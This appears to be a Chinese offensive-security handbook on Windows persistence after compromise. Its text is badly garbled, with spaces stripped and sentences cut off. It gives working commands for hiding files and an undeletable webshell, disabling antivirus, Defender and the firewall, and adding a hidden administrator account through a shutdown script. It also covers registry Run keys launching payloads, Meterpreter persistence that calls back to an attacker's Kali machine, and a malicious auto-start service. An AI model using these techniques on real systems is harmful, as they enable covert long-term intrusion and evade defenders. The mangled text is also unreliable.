2024Windows权限维持手册

Windows权限维持标，而不会失去指挥和控制服务器的通信。隐藏的技巧 “真正”隐藏文件 使用attrib+s+a+h+r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。Attrib+s+a+h+rAttrib+s+a+h+r测试如下：在当前目录输入命令Attrib+s+a+h+rtestAttrib+s+a+h+rtesttest接下来仍然可以使用Attrib-s-a-h-rtestAttrib-s-a-h-rtest恢复该文件的正常属性。就又回来了系统文件夹图标 建一个文件夹，假设叫“我的电脑”然后把要存放的文件放在里面3.给文件夹重新命名为“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”测试如下：在test文件夹里新建一个test.txt，将test文件夹重命名为“我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”。表等还无法删除，或者重命名后面的字段（图形化界面中）。但是此方法在cmd里面使用dir可以查看到，也能通过cd下面是代号:我的电脑我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}回收站.{645ff040-5081-101b-9f08-00aa002f954e}拔号⽹络.{992CFFA0-F557-101A-88EC-00DD010CCC48}打印机.{2227a280-3aea-1069-a2de-08002b30309d}控制⾯板.{21ec2020-3aea-1069-a2dd-08002b30309d}⽹上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}畸形目录 只需要在目录名后面加两个点或者多个点。用户图形界面无法访问。创建目录：创建目录：mdtest...\版本而定。//在目录中显示为test...，也有可能会显示为test..，随系统复制文件：copytest.txta...\test.txt删除目录：rd/s/qtest...\在win11中，该目录点击后没有反应在注册表中，也不能使用cd命令进入那么我们该怎么访问里面的文件呢，答案是通过浏览器来访问。在本地开一个http器，可以直接访问到里面的文件。除的webshell windows系统中，不能使用某些系统保留名来创建文件\文件夹，包括aux,com1,com2,prn,con和nul等，但是这些是可以通过cmd来创建的，并且使用copy命令就可以实现。F:\kcon>copytest.txtF:\kcon>copytest.txt已复制 1个文件。F:\kcon>dir驱动器F中的卷是F卷的序列号是426C-9176F:\kcon的目录02/15/202211:00AM<DIR>.02/15/202210:55AM7aux.asp11/05/202107:16PM8,045,026Containerescapein2021.pdf11/05/202107:16PM4,313,885FairplayPlayDRM.pdf02/15/202210:5502/15/202210:55AM11/05/202107:16PM5个文件7test.txt8,210,308高级攻防演练下的Webshell.pdf20,569,233字节1个目录56,456,802,304可用字节F:\kcon>delaux.asp利用系统保留文件名创建无法删除的webshell除，然而在IIS中，这种文件也可以解析。驱动级文件隐藏 驱动级文件隐藏可以通过一些软件来实现，比如EasyFileLocker径，你才可以读取文件内容。关闭杀软 拿到目标的shell后，我们做的第一件事情就是关闭目标主机的杀毒软件，通过命令runkillavrunkillav//meterperter中使用netshadvfirewallsetallprofilesstateoff//netstopwindefend//关闭windowsdefender组策略 组策略后门比较起其他的后门更加隐蔽。往注册表中添加相应的键值实现随系统启动而运行的木马就是一个木马运行的常用例子。其实组策略也可以实现该功能，而且它还可以在系统关机的时候进行某种操作。这就是通过组策略的”脚本（启动/关机）“项目来实现的。具体的位置在”计算机配置->windows“项下。测试如下：在虚拟机里面新建一个txt，输入以下内容echooffechooffnetuserhack$test168/addnetlocalgroupadministratorshack$exit重命名为add.bat，接着在win+rgpedit.msc，定位到”计算机配置->windows设置->本(启动/关机）“，双击右边窗口的关机，在其中添加add.bat。就是说当系统关机时创建hack$用户。当他们获取了管理员的密码后，就可以直接利用管理员账户远程登陆系统。注册表 在windows性技术需要创建注册表，而各种渗透工具都提供了这种能力。注册表项可以从终端添加到运行键以实现持久性。这些键将包含用户登录时将执行的实际负载的引用注册表项可以从终端添加到运行键以实现持久性。这些键将包含用户登录时将执行的实际负载的引用命令行中我们可以输入以下命令来添加注册表regregadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"Pentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"Pentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices"/vPentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/vPentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"以上是添加当前用户的Run键。如果已经获得system权限的shell执行。regregadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"Pentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exeps：Run中的程序是在每次系统启动时被启动，RunServices则是会在每次登录系统时被启动。测试环境： kali:33win7(受害机)：40中转机:将shell.exe和pentestlab.exe下载进受害机器。并且连接shell。因为好输入的关系，就直接在受害机器的cmd上输入了命令重启受害机（以当前用户），发现会自动回连kali监听终端。另外还有两个注册表位置，这些位置允许攻击者通过执行任意有效负载或者DLL在登陆期间执行，并且需要管理员级别的权限。regaddregadd"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.dll"（ps:这个最特别的差别是它可以实现dll限。）Metasploit metasploit框架通过使用Meterpreter脚本和后期利用模块通过注册表支持持久性。Meterpreter脚本将以vbs项将在用户登录期间运行有效负载。测试环境： kali:33win7(受害机)：40中转机:仍然先连接shell。runrunpersistence-U-Pwindows/meterpreter/reverse_tcp-i5-p444433 #i反向连接的时间间隔-p指定端口-r远程ip接下来重启受害机等待自动重连。其实在注册表里面也是能够看到该注册项目的计划任务 windows操作系统提供了一个实用程序(schtasks.exe)或脚本。这种行为可作为一种持久性机制被恶意利用。通过计划任务执行持久性不需要管理员权限。但如果已经获得了管理员权限的话，则允许进一步操作，例如在用户登录期间或者在空闲状态期间来执行任务。计划任务的持久化技术既可以手动实现，也可以自动实现。有效负载可以从磁盘或者远程位置执行，它们可以具有可执行文件、Powershell但是仍然可以在持久化场景中使用。Metasploit的web_delivery模块可用于托管和生成各种格式的有效负载。新服务 如果未正确配置Windows升，创建一个新的服务需要管理员级别的权限。命令行实现 如果账户具有本地管理员特权，则可以从命令提示符创建服务。参数binpath而参数"auto"用于确保恶意服务自动启动scsccreatepentestlabbinpath="cmd.exe/kC:\Users\pte1\Downloads\pentestlab.exe"start="auto"obj="LocalSystem"scstartpentestlab测试环境： kali:33win7(受害机)：40中转机:注意cmd需要在管理员权限下使用为了方便就直接在受害机器上创建服务引用之前的木马。然后只需要启动服务就可以自动连接上msf话了Metasploit Metasploit框架的后开发模块，也支持两种持久性技术。注册表运行键新服务在新建的msf会话里面通过persistence_exe来增添新的服务。useusepost/windows/manage/persistence_exesetREXEPATH/tmp/pentestlab.exesetSESSION1setSTARTUPSERVICEsetLOCALEXEPATHC:\\tmprun测试环境： 在新建的msf会话里面输入以下命令usepost/windows/manage/persistence_exeusepost/windows/manage/persistence_exe设置相应参数之后run（ps：该方法需要在提权后的shell后才能使用，否则会创建失败）内存马 内存⻢是⽆⽂件攻击的⼀种技术⼿段，那我们不得不先简单介绍⼀下⽆⽂件攻击。⽆⽂件攻击可以有效地躲避传统安全软件的检测，它们可以在系统的内存中远程加载执⾏、驻留在注册表中或滥⽤常⽤的⽩名单⼯具，例如PowerShell，WindowsManagementInstrumentation（WMI）和PsExec攻击技术允许攻击者访问系统，从⽽启⽤后续的恶意活动。通过操纵漏洞利⽤程序、合法⼯具、宏和脚本，攻击者可以破坏系统、提升特权或在⽹络上横向传播恶意代码。⽽且，⽆⽂件威胁在执⾏后不会留下任何痕迹，这使其难以被检测和清除。内存⻢是⽆⽂件攻击的⼀种常⽤⼿段，随着攻防演练热度越来越⾼：攻防双⽅的博弈，流量分析、等专业安全设备被蓝⽅⼴泛使⽤，传统的⽂件上传的webshll或以⽂件形式驻留的后⻔越来越容易被检Webshell内存⻢，是在内存中写⼊恶意后⻔和⽊⻢并执⾏，达到远程控制Web服务器的⼀类内存⻢，其瞄准了企业的对外窗⼝：⽹站、应⽤。但传统的Webshell或⽹站漏洞植⼊⽊⻢，区别在于Webshell内存⻢是⽆⽂件⻢，利⽤中间件的进程执⾏某些恶意代码，不会有⽂件落地，给检测带来巨⼤难度。内存⻢类型根据内存⻢注⼊的⽅式，⼤致可以将内存⻢划分为如下两类servlet-api型 通过命令执⾏等⽅式动态注册⼀个新的listener、filter或者servletspring的controller内存⻢，tomcat的valve内存⻢字节码增强型通过java的instrumentation动态修改已有代码，进⽽实现命令执⾏等功能。什么是servletServletWebHTTPHTTP服务给⽤户。请求的处理过程客户端发起⼀个http请求，⽐如get类型。Servlet容器接收到请求，根据请求信息，封装成HttpServletRequest和HttpServletResponse对象。Servlet容器调⽤HttpServlet的init()⽅法，init⽅法只在第⼀次请求的时候被调⽤。Servlet容器调⽤service()⽅法。service()⽅法根据请求类型，这⾥是get类型，分别调⽤doGet或者doPost⽅法，这⾥调⽤doGet⽅法。doXXX⽅法中是我们⾃⼰写的业务逻辑。业务逻辑处理完成之后，返回给Servlet容器关闭时候，会调⽤destory⽅法。servlet生命周期服务器启动时(web.xml中配置load-on-startup=1，默认为0)或者第⼀次请求该servletServlet对象，也就是会执⾏初始化⽅法init(ServletConfigconf)。servlet对象去处理所有客户端请求，在service(ServletRequestreq，ServletResponseres)执⾏服务器关闭时，销毁这个servlet对象，执⾏destroy()⽅法。由JVM进⾏垃圾回收。劫持后门msdtc.exe简介msdtc.exeMicrosoftpersonalWebServer和MicrosoftSQLServer。该服务用于管理多个服务器。msdtc.exe源管理器。它对应的服务是MSDTC，全称为DistributedTransactionCoordinator，是windows系统默认启动的服务。对应的进程msdtc.exem,它位于windir/system32目录下当windows